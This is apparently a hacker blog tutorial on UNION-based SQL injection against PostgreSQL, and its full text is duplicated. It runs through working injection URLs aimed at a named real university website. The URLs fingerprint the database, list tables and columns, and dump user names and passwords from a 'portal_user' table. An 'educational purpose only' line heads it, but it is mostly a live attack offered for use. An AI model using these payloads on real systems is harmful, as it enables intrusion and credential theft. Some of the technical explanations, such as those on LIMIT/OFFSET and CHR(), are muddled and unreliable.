NOTE:This tutorial is for educational purpose only .
well u can varify this vulnerability (as said by Net_Spy a good sql injector)
by this error
Errors
MYSQL with MYSQL
or
MS SQL with SQL
or
ORACLE with ORA
or
MS ACCESS with Jet
or
Warning: pg_exec () [function.pg-exec]
but in our case the page is blank (i think the worst case)
well some basics for it also
|| is concatenation operator in POSTGRESQL (jux like Oracle)
we can use LIMIT function here but with some addition i.e. OFFSET if results are displayed one by one
Rest is same i think jux like mysql
now column count..
column count is same like mysql, mssql and oracle
with order by clause
comments in POSTGRESQL
-- This is a standard SQL comment
/* this is
* multiline comments syntax
*/
CASTING in POSTGRESQL
CAST ( 'string' AS type )
now lets inject the site
with order by clause we came to know that there are 8 columns in select statement before union
okay now union select * columns
here we use null like MSSQL or Oracle because we dont know the data type.. unlike php these are typed
so one by one put a string in place of null and u will see the string in web page if the column data type is nvarchar/nchar/char/varchar
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+
now for version()
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+
for database_name
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+
if this is showing only one
than
we can use limit function
like this
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
now jux increase the limit and find all other dbs
offset function show i table at a time
eg
limit 1 offset 1 =====> one database
limit 2 offset 2 =====> one database(next to first)
or
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
and same increase the limit to see other databases
now enumerating table_name
this will show all tables in all databases
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+
to see only tables of current database we will use
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+
now column name
this will show all columns of all tables of all databases
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+
to see only specific table columns we will use
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
now see if 'table_name' dont work than u need to use
CHR(table_name) and this is Oracle CHR()
u cannot use hex value in postgresql query anywhere..(i've tested well u can check ur self too..)
now dumping data..
this is same like Oracle..
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+
for reference
http://www.postgresql.org/docs/8.0/static/sql-syntax.html
Tutorial By Pk Injector
well u can varify this vulnerability (as said by Net_Spy a good sql injector)
by this error
Errors
MYSQL with MYSQL
or
MS SQL with SQL
or
ORACLE with ORA
or
MS ACCESS with Jet
or
Warning: pg_exec () [function.pg-exec]
but in our case the page is blank (i think the worst case)
well some basics for it also
|| is concatenation operator in POSTGRESQL (jux like Oracle)
we can use LIMIT function here but with some addition i.e. OFFSET if results are displayed one by one
Rest is same i think jux like mysql
now column count..
column count is same like mysql, mssql and oracle
with order by clause
comments in POSTGRESQL
-- This is a standard SQL comment
/* this is
* multiline comments syntax
*/
CASTING in POSTGRESQL
CAST ( 'string' AS type )
now lets inject the site
with order by clause we came to know that there are 8 columns in select statement before union
okay now union select * columns
here we use null like MSSQL or Oracle because we dont know the data type.. unlike php these are typed
so one by one put a string in place of null and u will see the string in web page if the column data type is nvarchar/nchar/char/varchar
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+
now for version()
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+
for database_name
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+
if this is showing only one
than
we can use limit function
like this
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
now jux increase the limit and find all other dbs
offset function show i table at a time
eg
limit 1 offset 1 =====> one database
limit 2 offset 2 =====> one database(next to first)
or
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
and same increase the limit to see other databases
now enumerating table_name
this will show all tables in all databases
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+
to see only tables of current database we will use
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+
now column name
this will show all columns of all tables of all databases
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+
to see only specific table columns we will use
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
now see if 'table_name' dont work than u need to use
CHR(table_name) and this is Oracle CHR()
u cannot use hex value in postgresql query anywhere..(i've tested well u can check ur self too..)
now dumping data..
this is same like Oracle..
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+
for reference
http://www.postgresql.org/docs/8.0/static/sql-syntax.html
Tutorial By Pk Injector
0 comments:
Post a Comment